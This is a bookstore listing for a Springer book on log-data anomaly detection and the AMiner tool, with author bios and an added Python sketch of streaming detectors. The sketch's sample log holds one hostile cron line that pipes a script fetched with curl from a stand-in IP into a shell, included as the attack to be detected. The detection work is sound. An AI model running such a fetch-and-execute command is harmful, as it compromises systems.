Smart Log Data Analytics: Techniques for Advanced Security Analysis
Skopik, Florian, Wurzenberger, Markus, Landauer, Max
- Publisher: Springer
- Publication date: 2021-08-29
- Price: $6,720
- Member price: 5% off, $6,384
- Language: English
- Pages: 140
- Binding: Hardcover
- ISBN: 3030744493
- ISBN-13: 9783030744496
Related categories:
Data Science, Information Security
Imported title (ordered from overseas; must be checked out separately)
Product description
This book provides insights into smart ways of analyzing computer log data, with the goal of spotting adversarial actions. It is organized into three major parts with a total of eight chapters that give a detailed view of existing solutions as well as novel techniques that go far beyond the state of the art. The first part motivates the entire topic, highlights major challenges, trends and design criteria for log data analysis approaches, and further surveys and compares the state of the art.

The second part introduces concepts that apply character-based, rather than token-based, approaches and thus work on a more fine-grained level. Furthermore, these solutions were designed for online use: they are not limited to forensic analysis but also process new log lines as they arrive, in an efficient single-pass manner. An advanced method for time series analysis aims at detecting changes in the overall behavior profile of an observed system and at spotting trends and periodicities through log analysis.

The third part introduces the design of the AMiner, an advanced open source component for log data anomaly mining. The AMiner comes with several detectors that spot new events, new parameters, new correlations, new values and unknown value combinations, and it can run as a stand-alone solution or as a sensor connected to a SIEM solution. More advanced detectors help to determine the characteristics of the variable parts of log lines, specifically the properties of numerical and categorical fields.
Detailed examples throughout this book allow the reader to better understand and apply the introduced techniques with open source software. Step-by-step instructions help to get familiar with the concepts and to better comprehend their inner mechanisms. A log test data set is available as free download and enables the reader to get the system up and running in no time.
This book is designed for researchers working in the field of cyber security, specifically system monitoring, anomaly detection and intrusion detection. Its content will be particularly useful for advanced-level students studying computer science, computer technology, and information systems. Forward-thinking practitioners who would benefit from becoming familiar with advanced anomaly detection methods will also find this book of interest.
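As an added illustration of the detector logic the description refers to (this is example code written for this listing, not code from the book or from the AMiner project), the following Python sketch makes a single pass over a stream of log lines, uses a short learning window as baseline, and then runs three detectors: a new event type (first occurrence of a parser path), a new value in a tracked field, and a previously unseen combination of otherwise known values. The parser model is written as regexes with named groups as a stand-in for AMiner's parser tree; the event names, field configuration and the syslog-style sample lines are all constructed for this example.

```python
"""Single-pass 'new event / new value / new value combination' detection over
a log stream.  Added illustration, not AMiner code; the parser model, sample
log lines and detector configuration below are constructed for this example."""
import re
from collections import defaultdict

# Parser model: one named regex per event type.  Stand-in for AMiner's parser
# tree; the event names and patterns are assumptions made for this example.
PARSER_MODEL = {
    "sshd_accepted": re.compile(
        r"^sshd\[(?P<pid>\d+)\]: Accepted (?P<method>\w+) for (?P<user>\S+) "
        r"from (?P<ip>[\d.]+) port (?P<port>\d+) ssh2$"),
    "cron_cmd": re.compile(
        r"^cron\[(?P<pid>\d+)\]: \((?P<user>\w+)\) CMD \((?P<cmd>.*)\)$"),
}
# Fields checked for new values (pid/port are high-cardinality and skipped)
# and field tuples checked for unseen combinations.  Assumed configuration.
VALUE_FIELDS = {"sshd_accepted": ("method", "user", "ip"),
                "cron_cmd": ("user", "cmd")}
COMBO_FIELDS = {"sshd_accepted": ("user", "ip")}

# Constructed sample log (not a real dataset): six baseline lines, then an
# unseen source IP, an unseen user, a known user from a known-but-different
# IP, and an event type never seen during learning.
SAMPLE_LOG = """\
sshd[1201]: Accepted password for alice from 10.0.0.5 port 50122 ssh2
sshd[1202]: Accepted password for bob from 10.0.0.7 port 50130 ssh2
sshd[1203]: Accepted password for alice from 10.0.0.5 port 50141 ssh2
sshd[1204]: Accepted password for bob from 10.0.0.7 port 50150 ssh2
sshd[1205]: Accepted password for alice from 10.0.0.5 port 50163 ssh2
sshd[1206]: Accepted password for bob from 10.0.0.7 port 50170 ssh2
sshd[1207]: Accepted password for alice from 10.0.0.9 port 50177 ssh2
sshd[1208]: Accepted password for mallory from 10.0.0.5 port 50180 ssh2
sshd[1209]: Accepted password for bob from 10.0.0.5 port 50191 ssh2
cron[77]: (root) CMD (/usr/bin/curl http://203.0.113.9/x.sh | sh)
"""


class StreamingDetector:
    """Keeps only the learned sets, so each line is handled once and state
    stays bounded by the number of distinct events/values, not by log size."""

    def __init__(self, train_lines):
        self.train_lines = train_lines        # lines consumed silently as baseline
        self.seen = 0
        self.known_events = set()
        self.known_values = defaultdict(set)  # (event, field) -> seen values
        self.known_combos = defaultdict(set)  # event -> seen value tuples

    @staticmethod
    def parse(line):
        for name, rx in PARSER_MODEL.items():
            m = rx.match(line)
            if m:
                return name, m.groupdict()
        return None, {}

    def process(self, line):
        """Consume one line and return [(detector, detail), ...] anomalies."""
        self.seen += 1
        learning = self.seen <= self.train_lines
        event, fields = self.parse(line)
        if event is None:                     # no parser path: always reported
            return [("unparsed", line)]
        anomalies = []
        # Detector 1: first occurrence of a parser path (new event type).
        if event not in self.known_events:
            if not learning:
                anomalies.append(("new_event", event))
            self.known_events.add(event)
        # Detector 2: first occurrence of a value in a tracked field.
        for f in VALUE_FIELDS.get(event, ()):
            if fields[f] not in self.known_values[(event, f)]:
                if not learning:
                    anomalies.append(("new_value", f"{event}.{f}={fields[f]}"))
                self.known_values[(event, f)].add(fields[f])
        # Detector 3: known values in a combination never seen together.
        combo = COMBO_FIELDS.get(event)
        if combo:
            values = tuple(fields[f] for f in combo)
            if values not in self.known_combos[event]:
                if not learning:
                    anomalies.append(("new_combo",
                                      f"{event}.{'+'.join(combo)}={'+'.join(values)}"))
                self.known_combos[event].add(values)
        # Report-once policy: the anomaly is learned after reporting, so a
        # repeat is silent.  Whether to learn from anomalies is a deployment
        # decision; with this policy an attacker's first login becomes baseline.
        return anomalies


def run(log_text, train_lines=6):
    """Stream every line through one detector; returns (line_no, kind, detail)."""
    det = StreamingDetector(train_lines)
    return [(n, kind, detail)
            for n, line in enumerate(log_text.splitlines(), 1)
            for kind, detail in det.process(line)]


if __name__ == "__main__":
    for line_no, kind, detail in run(SAMPLE_LOG):
        print(f"line {line_no}: {kind}: {detail}")
```

Run on the sample, lines 1 to 6 produce nothing, line 7 is flagged for a new IP and a new user/IP pair, line 8 for a new user, line 9 only for the combination (bob and 10.0.0.5 are both known, just never together), and the cron line for a new event type plus its unseen field values. Two caveats a practitioner should keep in mind: the regex parser is a token-level simplification of the kind the book's character-based approaches are meant to replace, and the report-once-then-learn policy means anything an attacker does once becomes part of the baseline, so in a real deployment the decision to learn from a reported anomaly should be separate from reporting it.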
About the authors
Florian Skopik is Head of the Cyber Security Research Program at the Austrian Institute of Technology (AIT), leading a team of around 30 people. He has spent more than 10 years in cyber security research, preceded by, and partly in parallel with, 15 years in software development. Nowadays, he coordinates national and large-scale international research projects, as well as the overall research direction of the team. His main interests are centered on critical infrastructure protection, smart grid security and national cyber security and defense. Since 2018, Florian has also worked as an ISO 27001 Lead Auditor. Before joining AIT in 2011, Florian was with the Distributed Systems Group at the Vienna University of Technology as a research assistant and post-doctoral research scientist from 2007 to 2011, where he was involved in a number of international research projects dealing with cross-organizational collaboration over the Web. In the context of these projects he also completed his PhD. He further spent a sabbatical of several months at IBM Research India in Bangalore. He has published more than 125 scientific conference papers and journal articles and holds more than 50 industry-recognized security certifications, including CISSP, CISM, CISA, CRISC, and CCNP Security. In 2017 he completed a professional degree in Advanced Computer Security at Stanford University, USA. Florian is a member of various conference program committees, editorial boards and standardization groups, such as ETSI TC Cyber and OASIS CTI. He frequently serves as a reviewer for numerous high-profile journals, including Elsevier's Computers & Security. He is a registered subject matter expert with ENISA in the areas of new ICTs and emerging application areas as well as Critical Information Infrastructure Protection (CIIP) and CSIRTs cooperation.
In his career, he has given several keynote speeches, organized scientific panel discussions at flagship conferences, such as a smart grid security panel at the IEEE Innovative Smart Grid Technologies (ISGT) conference in Washington D.C., and acted as co-moderator of the National Austrian Cyber Security Challenge 2017 and as a jury member of the United Nations Cyber Security Challenge 2019. Florian is an IEEE Senior Member, a Senior Member of the Association for Computing Machinery (ACM), a Member of (ISC)2, a Member of ISACA and a Member of the International Society of Automation (ISA).
Markus Wurzenberger is a scientist and project manager at the Austrian Institute of Technology (AIT) in Vienna, Austria. His main research interests are log data analysis, with a focus on anomaly detection, and cyber threat intelligence (CTI). This includes the development of (i) novel machine learning methods that allow online processing of large amounts of log data to enable attack detection in real time, and (ii) artificial intelligence (AI) methods and concepts for extracting threat information from anomalies to automatically generate actionable and shareable CTI. Besides his involvement in several national and international research projects, Markus is one of the key researchers working on AIT's anomaly detection project AECID (Automatic Event Correlation for Incident Detection). Among the most prominent solutions developed within this project, Markus and his team created AMiner, a software component for log analysis that implements several anomaly detection algorithms and is included as a package in the official Debian distribution. In 2016, Markus enrolled in PhD studies in computer science at the Vienna University of Technology, with a focus on anomaly detection in computer log data. The subject of his PhD aligns with several national and international research projects AIT is involved in. In 2015 Markus obtained his Master's Degree in Technical Mathematics at the Vienna University of Technology. Since 2014 he has been a full-time researcher at AIT in the area of cyber security.
Max Landauer finished his Bachelor's Degree in Business Informatics at the Vienna University of Technology in 2016. In 2017, he joined the Austrian Institute of Technology (AIT), where he carried out his Master's Thesis on clustering and time-series analysis of system log data. He started his PhD studies as a cooperative project between the Vienna University of Technology and the Austrian Institute of Technology in 2018. For his dissertation, Max is working on an automatic threat intelligence mining approach that extracts actionable CTI from raw log data. The goal of this research is to transform threat information shared by different organizations into abstract alert patterns that allow detection and classification of similar attacks. Moreover, Max is a maintainer of the logdata-anomaly-miner (AMiner), an open-source agent for parsing and analyzing all kinds of system logs that is developed at AIT and available in the Debian distribution. He also contributes to multiple other tools that are part of AECID (Automatic Event Correlation for Incident Detection), a framework for efficient and scalable log data analysis techniques such as parser generation and log clustering. Max has multiple years of experience with nationally and internationally funded projects in numerous areas, including machine learning, artificial intelligence, cyber-physical systems, and digital service chains. He is currently employed as a Junior Scientist in the Center for Digital Safety and Security at the Austrian Institute of Technology. His main research interests are log data analysis, anomaly detection, and cyber threat intelligence.